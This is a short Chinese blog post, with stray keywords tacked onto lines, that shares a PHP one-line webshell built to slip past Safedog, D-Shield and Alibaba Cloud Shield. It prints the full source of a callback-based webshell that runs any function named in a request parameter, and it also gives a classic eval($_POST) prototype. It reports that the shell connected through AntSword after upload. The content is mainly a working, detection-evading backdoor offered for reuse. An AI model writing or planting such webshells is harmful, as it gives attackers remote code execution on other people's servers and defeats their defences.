前言php
在测试某网站时,发现为阿里云服务器,上传的一句话均被kill掉,因而搞了个过web安全狗,D盾,云盾的一句话木马,在此分享出来。web
正文安全
一句话源码:服务器
1 <?php 2 class a{ 3 public function __construct(){ 4 $this->a = $_REQUEST['a']; 5 } 6 public function get(){ 7 $a = $this->a; 8 return $a; 9 } 10 } 11 $func = new a; 12 # call_user_func_array($func->get(),$_REQUEST['b']); 13 $params = $_REQUEST['b']; 14 function callback($a,$b){ 15 $a($b); 16 } 17 callback($func->get(),$params);
WEB安全狗 V4.0:函数
D盾:web安全
若是一句话中使用 call_user_func_array 作回调函数的话会产生级别2:测试
阿里云盾:网站
首先上传一个一句话木马原型:<?php eval($_POST['xxx'])?>this
能够看到被检测出,在上传过狗一句话:阿里云
能够看到阿里云一句话使用蚁剑链接成功。
最后
其实一句话想过狗并无想象中的那么难,总之就是将简单的事情复杂化,经过各类手段执行一句话原型便可。